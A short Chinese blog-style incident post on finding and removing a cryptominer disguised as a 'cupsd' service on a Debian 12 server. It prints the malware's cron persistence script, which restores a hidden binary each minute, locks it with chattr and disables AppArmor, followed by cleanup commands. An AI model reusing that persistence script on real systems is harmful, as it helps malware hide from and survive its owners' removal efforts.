最近更新于 2026-09-13 12:33
我的代理服务器长时间有个 cupsd 服务高占用,杀掉会重启,检查发现也没有安装正常的 cupsd 服务,那就是病毒伪装的服务。

grep -rn "/usr/sbin/cupsd" /etc/systemd/system/ /lib/systemd/system/ /etc/cron* /var/spool/cron/ 2>/dev/null
输出
/etc/systemd/system/cupsd.service:10:ExecStart=/usr/sbin/cupsd
/etc/cron.d/cupsd-keepalive:1:* * * * * root /bin/sh -c 'if [ ! -f /usr/sbin/cupsd ]; then chattr -i /usr/sbin/cupsd 2>/dev/null; cp /var/local/.cup/vc.bin /usr/sbin/cupsd 2>/dev/null; chattr +i /usr/sbin/cupsd 2>/dev/null; fi; chmod 755 /usr/sbin/cupsd 2>/dev/null; alive=0; for p in $(pgrep -x cupsd 2>/dev/null); do [ "$(readlink /proc/$p/exe 2>/dev/null)" = "/usr/sbin/cupsd" ] && alive=1; done; [ "$alive" = "1" ] || systemctl restart cupsd.service >/dev/null 2>&1; systemctl is-enabled cupsd.service >/dev/null 2>&1 || systemctl enable cupsd.service >/dev/null 2>&1; aa-status 2>/dev/null | grep -q cupsd && { ln -sf /etc/apparmor.d/usr.sbin.cupsd /etc/apparmor.d/disable/usr.sbin.cupsd 2>/dev/null; apparmor_parser -R /etc/apparmor.d/usr.sbin.cupsd >/dev/null 2>&1; }'
AI 分析结果是
自启动服务:/etc/systemd/system/cupsd.service
定时保持保活脚本:/etc/cron.d/cupsd-keepalive(每分钟检查一次,如果 /usr/sbin/cupsd 被删了,就会自动从备份位置复制过来恢复!)
木马隐藏备份源:/var/local/.cup/vc.bin
给出的方法如下,完整复制所有命令,一次性粘贴运行,不留时间让病毒复活
# 停止服务
systemctl stop cupsd.service 2>/dev/null
systemctl disable cupsd.service 2>/dev/null
# 解锁并删除隐藏的备份木马源
chattr -i /var/local/.cup/vc.bin 2>/dev/null
rm -rf /var/local/.cup
# 删除定时复活任务
chattr -i /etc/cron.d/cupsd-keepalive 2>/dev/null
rm -f /etc/cron.d/cupsd-keepalive
# 删除恶意 systemd 服务文件
chattr -i /etc/systemd/system/cupsd.service 2>/dev/null
rm -f /etc/systemd/system/cupsd.service
# 重载系统服务配置
systemctl daemon-reload
# 清除主木马程序
chattr -i /usr/sbin/cupsd 2>/dev/null
rm -f /usr/sbin/cupsd
# 强制终止所有残留 cupsd 进程
pkill -9 -f cupsd
Debian 12 服务器被感染挖矿了
